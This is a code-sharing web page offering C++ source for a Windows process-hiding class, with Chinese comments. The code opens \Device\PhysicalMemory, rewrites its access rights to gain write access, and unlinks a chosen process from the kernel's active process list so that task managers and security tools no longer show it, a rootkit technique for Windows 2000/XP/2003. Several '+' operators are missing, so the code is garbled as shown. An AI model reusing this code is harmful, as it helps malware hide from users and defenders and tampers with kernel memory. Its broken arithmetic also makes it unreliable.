实例介绍
【实例简介】
【实例截图】
【核心代码】
// HideProcess.cpp: implementation of the CHideProcess class.
//进程隐藏程序
// 要隐藏时调用HideProcess即可
//////////////////////////////////////////////////////////////////////
#include "stdafx.h"
#include <windows.h>
#include <Accctrl.h>
#include <Aclapi.h>
#include "HideProc.h"
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)
#define STATUS_ACCESS_DENIED ((NTSTATUS)0xC0000022L)
typedef LONG NTSTATUS;
typedef struct _IO_STATUS_BLOCK
{
NTSTATUS Status;
ULONG Information;
} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;
typedef struct _UNICODE_STRING
{
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;
#define OBJ_INHERIT 0x00000002L
#define OBJ_PERMANENT 0x00000010L
#define OBJ_EXCLUSIVE 0x00000020L
#define OBJ_CASE_INSENSITIVE 0x00000040L
#define OBJ_OPENIF 0x00000080L
#define OBJ_OPENLINK 0x00000100L
#define OBJ_KERNEL_HANDLE 0x00000200L
#define OBJ_VALID_ATTRIBUTES 0x000003F2L
typedef struct _OBJECT_ATTRIBUTES
{
ULONG Length;
HANDLE RootDirectory;
PUNICODE_STRING ObjectName;
ULONG Attributes;
PVOID SecurityDescriptor;
PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;
//
// SYSTEM_INFORMATION_CLASS
//
typedef enum _SYSTEM_INFORMATION_CLASS
{
SystemHandleInformation = 16
} SYSTEM_INFORMATION_CLASS;
//
// SYSTEM_HANDLE_INFORMATION
// Information Class 16
//
typedef struct _SYSTEM_HANDLE_INFORMATION
{
ULONG ProcessId;
UCHAR ObjectTypeNumber;
UCHAR Flags;
USHORT Handle;
PVOID Object;
ACCESS_MASK GrantedAccess;
} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;
typedef NTSTATUS (CALLBACK* ZWOPENSECTION)(
OUT PHANDLE SectionHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes
);
typedef VOID (CALLBACK* RTLINITUNICODESTRING)(
IN OUT PUNICODE_STRING DestinationString,
IN PCWSTR SourceString
);
typedef NTSTATUS ( __stdcall *ZWQUERYSYSTEMINFORMATION ) (
IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
IN OUT PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength OPTIONAL
);
RTLINITUNICODESTRING RtlInitUnicodeString = NULL;
ZWOPENSECTION ZwOpenSection = NULL;
ZWQUERYSYSTEMINFORMATION ZwQuerySystemInformation = NULL;
HMODULE g_hNtDLL = NULL;
PVOID g_pMapPhysicalMemory = NULL;
HANDLE g_hMPM = NULL;
OSVERSIONINFO g_osvi;
//---------------------------------------------------------------------------
BOOL CHideProcess::m_bInit = FALSE;
CHideProcess CHideProcess::m_NoAction;
//////////////////////////////////////////////////////////////////////
// Construction/Destruction
//////////////////////////////////////////////////////////////////////
CHideProcess::CHideProcess()
{
m_bInit = InitNTDLL();
}
CHideProcess::~CHideProcess()
{
CloseNTDLL();
}
// load dll and get functions
BOOL CHideProcess::InitNTDLL()
{
// load dll
if (NULL == g_hNtDLL)
{
g_hNtDLL = LoadLibrary(_T("ntdll.dll"));
if (NULL == g_hNtDLL)
{
return FALSE;
}
}
// get functions
RtlInitUnicodeString = (RTLINITUNICODESTRING)GetProcAddress( g_hNtDLL, "RtlInitUnicodeString");
ZwOpenSection = (ZWOPENSECTION)GetProcAddress( g_hNtDLL, "ZwOpenSection");
ZwQuerySystemInformation = ( ZWQUERYSYSTEMINFORMATION )GetProcAddress( g_hNtDLL, "ZwQuerySystemInformation" );
if ((RtlInitUnicodeString == NULL)
|| (ZwOpenSection == NULL)
|| (ZwQuerySystemInformation == NULL))
{
return FALSE;
}
m_bInit = TRUE;
return TRUE;
}
//---------------------------------------------------------------------------
VOID CHideProcess::CloseNTDLL()
{
if (NULL != g_hNtDLL)
{
FreeLibrary(g_hNtDLL);
g_hNtDLL = NULL;
m_bInit = FALSE;
}
}
//---------------------------------------------------------------------------
VOID CHideProcess::SetPhyscialMemorySectionCanBeWrited(HANDLE hSection)
{
PACL pDacl = NULL;
PSECURITY_DESCRIPTOR pSD = NULL;
PACL pNewDacl = NULL;
DWORD dwRes = GetSecurityInfo(
hSection,
SE_KERNEL_OBJECT,
DACL_SECURITY_INFORMATION,
NULL,
NULL,
&pDacl,
NULL,
&pSD
);
if(ERROR_SUCCESS != dwRes)
{
if(pSD)
LocalFree(pSD);
if(pNewDacl)
LocalFree(pNewDacl);
}
EXPLICIT_ACCESS ea;
RtlZeroMemory(&ea, sizeof(EXPLICIT_ACCESS));
ea.grfAccessPermissions = SECTION_MAP_WRITE;
ea.grfAccessMode = GRANT_ACCESS;
ea.grfInheritance= NO_INHERITANCE;
ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME;
ea.Trustee.TrusteeType = TRUSTEE_IS_USER;
ea.Trustee.ptstrName = _T("CURRENT_USER");
dwRes = SetEntriesInAcl(1,&ea,pDacl,&pNewDacl);
if(ERROR_SUCCESS != dwRes)
{
if(pSD)
LocalFree(pSD);
if(pNewDacl)
LocalFree(pNewDacl);
}
dwRes = SetSecurityInfo(
hSection,
SE_KERNEL_OBJECT,
DACL_SECURITY_INFORMATION,
NULL,
NULL,
pNewDacl,
NULL
);
if(ERROR_SUCCESS != dwRes)
{
if(pSD)
LocalFree(pSD);
if(pNewDacl)
LocalFree(pNewDacl);
}
}
//---------------------------------------------------------------------------
HANDLE CHideProcess::OpenPhysicalMemory()
{
NTSTATUS status;
UNICODE_STRING physmemString;
OBJECT_ATTRIBUTES attributes;
ULONG PhyDirectory;
g_osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
GetVersionEx (&g_osvi);
if (5 != g_osvi.dwMajorVersion)
return NULL;
switch(g_osvi.dwMinorVersion)
{
case 0:
PhyDirectory = 0x30000;
break; // 2k
case 1:
PhyDirectory = 0x39000;
break; // xp
case 2:
PhyDirectory = 0x39000;
break; // 2k03
default:
AfxMessageBox(_T("init PhysicalMemory: Unknown version..."));
TRACE(_T("init PhysicalMemory: Unknown version...\n"));
return NULL;
}
RtlInitUnicodeString(&physmemString, L"\\Device\\PhysicalMemory");
attributes.Length = sizeof(OBJECT_ATTRIBUTES);
attributes.RootDirectory = NULL;
attributes.ObjectName = &physmemString;
attributes.Attributes = 0;
attributes.SecurityDescriptor = NULL;
attributes.SecurityQualityOfService = NULL;
status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ|SECTION_MAP_WRITE, &attributes);
if(status == STATUS_ACCESS_DENIED)
{
status = ZwOpenSection(&g_hMPM, READ_CONTROL|WRITE_DAC, &attributes);
SetPhyscialMemorySectionCanBeWrited(g_hMPM);
CloseHandle(g_hMPM);
status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ|SECTION_MAP_WRITE, &attributes);
}
if(!NT_SUCCESS(status))
{
AfxMessageBox(_T("Open section: \\Device\\PhysicalMemory failed..."));
TRACE(_T("Open section: \\Device\\PhysicalMemory failed...\n"));
return NULL;
}
TRACE(_T("OpenPhysicalMemory() OffSet: %p\n"), PhyDirectory);
g_pMapPhysicalMemory = MapViewOfFile( // ZwMapViewOfSection
g_hMPM, // handle
FILE_MAP_READ|FILE_MAP_WRITE,
0, // offset high part
PhyDirectory, // offset low part
0x1000 // size
);
if( g_pMapPhysicalMemory == NULL )
{
AfxMessageBox(_T("\\Device\\PhysicalMemory MapViewOfFile failed..."));
TRACE(_T("\\Device\\PhysicalMemory MapViewOfFile failed..."));
return NULL;
}
return g_hMPM;
}
//---------------------------------------------------------------------------
PVOID CHideProcess::LinearToPhys(PULONG BaseAddress, PVOID addr)
{
ULONG VAddr = (ULONG)addr;
ULONG PGDE = BaseAddress[VAddr>>22];
ULONG PTE;
ULONG PAddr;
if (0 == (PGDE & 1))
return 0;
ULONG tmp = PGDE & 0x00000080;
if (0 != tmp)
{
PAddr = (PGDE & 0xFFC00000) (VAddr & 0x003FFFFF);
}
else
{
TRACE(_T("GetData() OffSet: %p\n"), PGDE & 0xfffff000);
PGDE = (ULONG)MapViewOfFile(g_hMPM, 4, 0, PGDE & 0xfffff000, 0x1000);
PTE = ((PULONG)PGDE)[(VAddr&0x003FF000)>>12];
if (0 == (PTE&1))
return 0;
PAddr=(PTE&0xFFFFF000) (VAddr&0x00000FFF);
UnmapViewOfFile((PVOID)PGDE);
}
return (PVOID)PAddr;
}
//---------------------------------------------------------------------------
ULONG CHideProcess::GetData(PVOID addr)
{
ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, (PVOID)addr);
TRACE(_T("GetData() g_pMapPhysicalMemory: %p, addr: %p, phys: %p\n"),
g_pMapPhysicalMemory, addr, phys);
TRACE(_T("GetData() OffSet: %p\n"), phys & 0xfffff000);
PULONG tmp = (PULONG)MapViewOfFile(
g_hMPM,
FILE_MAP_READ|FILE_MAP_WRITE,
0,
phys & 0xfffff000, // offset low part
0x1000 // size
);
if (0 == tmp)
return 0;
ULONG ret = tmp[(phys & 0xFFF)>>2];
UnmapViewOfFile(tmp);
return ret;
}
//---------------------------------------------------------------------------
BOOL CHideProcess::SetData(PVOID addr,ULONG data)
{
ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, (PVOID)addr);
TRACE(_T("SetData() OffSet: %p\n"), phys & 0xfffff000);
PULONG tmp = (PULONG)MapViewOfFile(
g_hMPM,
FILE_MAP_WRITE,
0,
phys & 0xfffff000,
0x1000
);
if (0 == tmp)
return FALSE;
tmp[(phys & 0xFFF)>>2] = data;
UnmapViewOfFile(tmp);
return TRUE;
}
//---------------------------------------------------------------------------
/*
long __stdcall CHideProcess::exeception(struct _EXCEPTION_POINTERS *tmp)
{
ExitProcess(0);
return 1 ;
}
//*/
//---------------------------------------------------------------------------
DWORD CHideProcess::GetEprocessFromPid (ULONG PID)
{
NTSTATUS status;
PVOID buf = NULL;
ULONG size = 1;
ULONG NumOfHandle = 0;
ULONG i;
PSYSTEM_HANDLE_INFORMATION h_info = NULL;
DWORD dwCurrentID = GetCurrentProcessId();
// TRACE(_T("GetCurrentProcessId = %d\n"), dwCurrentID);
// LocateNtdllEntry( );
//打开自身句柄,这样才能在 handle 列表中找到自己, PROCESS 对应 ObjectTypeNum 为5
HANDLE hProc = OpenProcess(
// PROCESS_ALL_ACCESS,
PROCESS_QUERY_INFORMATION,
FALSE,
PID // GetCurrentProcessId() //
);
if (NULL == hProc)
{
TRACE(_T("OpenProcess failed! GetLastError() = %d\n"), GetLastError());
TRACE(_T("OpenProcess failed! GetLastError() = %d\n"), GetLastError());
return 0;
}
for ( size = 1024; ; size *= 2 )
{
if ( NULL == ( buf = calloc( size, 1 ) ) )
{
TRACE( _T("calloc( %u, 1 ) failed\n"), size );
TRACE(_T("calloc( %u, 1 ) failed\n"), size );
if ( buf != NULL )
{
free( buf );
buf = NULL;
}
CloseHandle(hProc);
return 0;
}
status = ZwQuerySystemInformation( SystemHandleInformation, buf, size, NULL );
if ( !NT_SUCCESS( status ) )
{
if ( STATUS_INFO_LENGTH_MISMATCH == status )
{
free( buf );
buf = NULL;
continue;
}
else
{
TRACE( "ZwQuerySystemInformation() failed\n");
TRACE( "ZwQuerySystemInformation() failed\n");
if ( buf != NULL )
{
free( buf );
buf = NULL;
}
CloseHandle(hProc);
return 0;
}
}
else
{
break;
}
} /* end of for */
//返回到缓冲区的首先是一个ULONG类型的数据,表示有多少数组
NumOfHandle = *((PULONG)buf);
h_info = ( PSYSTEM_HANDLE_INFORMATION )((ULONG)buf 4);
for(i = 0; i < NumOfHandle; i )
{
if(h_info->ProcessId == dwCurrentID)//&&( h_info.Handle==0x3d8 ) )
{
// TRACE(_T("ProcessId: %d, Handle: %p, OBJECT: %p, ObjectTypeNumber: %d\n\r"),
// PID, h_info.Handle, h_info.Object, h_info.ObjectTypeNumber);
if (h_info->Handle == (DWORD)hProc) // (h_info.ObjectTypeNumber == 5)
{
// TRACE(_T("****ProcessId: %d, Handle:%p, OBJECT %p\n\r"),
// PID, hProc, h_info.Object);
DWORD dwRet = (DWORD)(h_info->Object);
if (buf != NULL)
{
free( buf );
buf = NULL;
}
CloseHandle(hProc);
return dwRet;
}
}
}
if ( buf != NULL )
{
free( buf );
buf = NULL;
}
CloseHandle(hProc);
return 0;
}
// 隐藏进程主函数
BOOL CHideProcess::YHideProcess(DWORD dwID)
{
//
if (!m_bInit)
{
AfxMessageBox(_T("load NTDLL failed..."));
TRACE(_T("load NTDLL failed...\n"));
return FALSE;
}
// 获得指向进程的 EPROCESS 数据块的指针
ULONG process = (ULONG)GetEprocessFromPid(dwID);
if (process == 0)
{
//
TRACE(_T("GetEprocessFromPid() failed...\n"));
return FALSE;
}
TRACE(_T("GetEprocessFromPid() process = %p...\n"), process);
// 这个是打开对应的系统内存,并且映射为一个核心对象
if (NULL == OpenPhysicalMemory())
{
AfxMessageBox(_T("OpenPhysicalMemory() failed..."));
TRACE(_T("OpenPhysicalMemory() failed...\n"));
return FALSE;
}
//
// 下面的两个 if 完成对 Windows 的系统版本判断(只判断了2K和XP),
// 并且根据不同的系统确定 EPROCESS 块中两个指针 FLINK 和 BLINK 的偏移位置
ULONG fw, bw;
if (0 == g_osvi.dwMinorVersion)
{
// in Win2000/Vista:
fw = GetData(PVOID(process 0xa0));
bw = GetData(PVOID(process 0xa4));
}
else if ((1 == g_osvi.dwMinorVersion)
|| (2 == g_osvi.dwMinorVersion))
{
// in WinXP: in Win2003
fw = GetData(PVOID(process 0x88));
bw = GetData(PVOID(process 0x8c));
}
// ****
TRACE(_T("process = %p\tfw = %p\tbw = %p ****Correct\n"), process, fw, bw);
TRACE(_T("process = %p\tfw = %p\tbw = %p ****Correct\n"), process, fw, bw);
// 下面的两个SetData完成对进程活动链的更改,
// 也就是让进程活动链跳过当前进程的EPROCESS块
SetData(PVOID(fw 4), bw);
SetData(PVOID(bw), fw);
// 完成了
UnmapViewOfFile(g_pMapPhysicalMemory);
g_pMapPhysicalMemory = NULL;
CloseHandle(g_hMPM);
g_hMPM = NULL;
return TRUE;
}
// 隐藏进程接口
BOOL CHideProcess::HideCurrent()
{
TRACE(_T("Hide Current Process ID = %d \n"), GetCurrentProcessId());
return YHideProcess(GetCurrentProcessId());
}
// 隐藏进程接口
BOOL CHideProcess::HideByID(DWORD dwID)
{
TRACE(_T("Hide Process ID = %d \n"), dwID);
return YHideProcess(dwID);
}
标签: 进程
好例子网口号:伸出你的我的手 — 分享!
小贴士
感谢您为本站写下的评论,您的评论对其它用户来说具有重要的参考价值,所以请认真填写。
- 类似“顶”、“沙发”之类没有营养的文字,对勤劳贡献的楼主来说是令人沮丧的反馈信息。
- 相信您也不想看到一排文字/表情墙,所以请不要反馈意义不大的重复字符,也请尽量不要纯表情的回复。
- 提问之前请再仔细看一遍楼主的说明,或许是您遗漏了。
- 请勿到处挖坑绊人、招贴广告。既占空间让人厌烦,又没人会搭理,于人于己都无利。
关于好例子网
本站旨在为广大IT学习爱好者提供一个非营利性互相学习交流分享平台。本站所有资源都可以被免费获取学习研究。本站资源来自网友分享,对搜索内容的合法性不具有预见性、识别性、控制性,仅供学习研究,请务必在下载后24小时内给予删除,不得用于其他任何用途,否则后果自负。基于互联网的特殊性,平台无法对用户传输的作品、信息、内容的权属或合法性、安全性、合规性、真实性、科学性、完整权、有效性等进行实质审查;无论平台是否已进行审查,用户均应自行承担因其传输的作品、信息、内容而可能或已经产生的侵权或权属纠纷等法律责任。本站所有资源不代表本站的观点或立场,基于网友分享,根据中国法律《信息网络传播权保护条例》第二十二与二十三条之规定,若资源存在侵权或相关问题请联系本站客服人员,点此联系我们。关于更多版权及免责申明参见 版权及免责申明
网友评论
我要评论